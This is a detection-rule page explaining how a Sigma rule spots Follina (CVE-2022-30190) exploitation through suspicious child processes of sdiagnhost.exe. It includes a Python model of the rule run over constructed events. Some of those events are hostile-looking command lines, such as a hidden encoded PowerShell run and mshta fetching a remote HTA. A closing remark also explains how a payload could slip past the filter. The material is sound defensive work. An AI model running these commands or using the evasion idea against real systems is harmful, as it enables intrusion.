
Summary
This rule detects suspicious child processes spawned by `sdiagnhost.exe`, the Scripted Diagnostics Native Host that the Microsoft Support Diagnostic Tool (MSDT) uses to run troubleshooting packs. Its primary context is the Follina vulnerability (CVE-2022-30190): a crafted Microsoft Office document invokes the `ms-msdt:` protocol handler, and the attacker-supplied command is ultimately executed through `sdiagnhost.exe`, so the payload appears as a child process of it. The selection therefore requires `sdiagnhost.exe` as the parent image and matches the child image against a predefined list of executables commonly abused for execution, such as `powershell.exe` and `cmd.exe`. Because legitimate troubleshooting packs also launch `cmd.exe` and `powershell.exe`, the rule carries filters for those known-benign invocations to reduce false positives; any event that survives the filters should be treated as a likely exploitation attempt. The rule needs process-creation telemetry that records the parent image and the command line (for example Sysmon Event ID 1, or Security event 4688 with command-line auditing enabled), since the filters depend on the command line. Monitoring these events lets defenders catch Follina-style exploitation as it happens rather than after the fact.
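The selection-and-filter logic described above, as an added example run over constructed process-creation events. This is not the rule's own code (the rule itself is expressed in Sigma); it models the same semantics in Python. The Sysmon-style field names (`Image`, `ParentImage`, `CommandLine`), the exact list of suspicious child executables beyond `powershell.exe` and `cmd.exe`, the false-positive filter (a command line pointing into `\Windows\diagnostics\`), and every event are assumptions made for illustration.

```python
"""Added example: model the sdiagnhost.exe suspicious-child detection
(selection AND NOT filter) and run it over constructed events.
Not the rule's own code; field names, child list, filter and events are assumed."""
from __future__ import annotations

import ntpath

# Assumed list of commonly abused child executables. The page names
# powershell.exe and cmd.exe explicitly; the rest are illustrative.
SUSPICIOUS_CHILDREN = {
    "powershell.exe", "pwsh.exe", "cmd.exe", "mshta.exe",
    "cscript.exe", "wscript.exe", "rundll32.exe", "regsvr32.exe",
    "taskkill.exe", "calc.exe",
}

# Hypothetical false-positive filter (assumption, not the rule's own):
# built-in troubleshooting packs live under %SystemRoot%\diagnostics, so a
# cmd/powershell child whose command line points there is treated as benign.
LEGIT_PATH_MARKERS = ("\\windows\\diagnostics\\",)


def image_name(path: str) -> str:
    """Lower-cased file name of a Windows path (works on any host OS)."""
    return ntpath.basename(path).lower()


def is_filtered(event: dict) -> bool:
    """Filter: known-benign cmd.exe / powershell.exe troubleshooter runs."""
    if image_name(event.get("Image", "")) not in ("cmd.exe", "powershell.exe"):
        return False
    cmdline = event.get("CommandLine", "").lower()
    return any(marker in cmdline for marker in LEGIT_PATH_MARKERS)


def matches(event: dict) -> bool:
    """Selection: parent is sdiagnhost.exe AND child is on the list,
    minus anything the false-positive filter excludes."""
    parent_ok = image_name(event.get("ParentImage", "")) == "sdiagnhost.exe"
    child_ok = image_name(event.get("Image", "")) in SUSPICIOUS_CHILDREN
    return parent_ok and child_ok and not is_filtered(event)


# Constructed events (Sysmon EID 1 style); none are real captures.
SDIAG = r"C:\Windows\System32\sdiagnhost.exe"
CONSTRUCTED_EVENTS = [
    {   # Follina-style: cmd.exe launched to run the attacker's command
        "EventId": "E1", "ParentImage": SDIAG,
        "Image": r"C:\Windows\System32\cmd.exe",
        "CommandLine": 'cmd.exe /c "calc.exe"',
    },
    {   # Benign: troubleshooting pack script from the diagnostics directory
        "EventId": "E2", "ParentImage": SDIAG,
        "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "CommandLine": r"powershell.exe -NoProfile -File C:\Windows\diagnostics\system\Example\TS_Example.ps1",
    },
    {   # Hidden, encoded PowerShell with no diagnostics path: survives the filter
        "EventId": "E3", "ParentImage": SDIAG,
        "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "CommandLine": "powershell.exe -nop -w hidden -enc QQBBAEEA",
    },
    {   # Wrong parent: cmd.exe from explorer.exe is out of scope for this rule
        "EventId": "E4", "ParentImage": r"C:\Windows\explorer.exe",
        "Image": r"C:\Windows\System32\cmd.exe",
        "CommandLine": "cmd.exe",
    },
    {   # mshta.exe under sdiagnhost.exe: on the list, no filter applies
        "EventId": "E5", "ParentImage": SDIAG,
        "Image": r"C:\Windows\System32\mshta.exe",
        "CommandLine": "mshta.exe http://example.invalid/x.hta",
    },
    {   # Child not on the list: ignored even though the parent matches
        "EventId": "E6", "ParentImage": SDIAG,
        "Image": r"C:\Windows\System32\notepad.exe",
        "CommandLine": "notepad.exe",
    },
]


def alerting_event_ids(events: list[dict]) -> list[str]:
    """Return the EventIds that the rule would alert on, in input order."""
    return [e["EventId"] for e in events if matches(e)]


if __name__ == "__main__":
    for event in CONSTRUCTED_EVENTS:
        verdict = "ALERT" if matches(event) else "-"
        print(f"{event['EventId']:>3} {verdict:5} {event['CommandLine']}")
```

Note that event E2 is suppressed only because its command line references the diagnostics directory; a Follina payload that deliberately embeds that string in its command line would also slip past such a filter, so filters of this kind should be as narrow as the observed benign behaviour allows, and the parent/child relationship itself should still be reviewed when in doubt.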
Categories
- Endpoint
- Windows
Data Sources
- Process
Created: 2022-06-01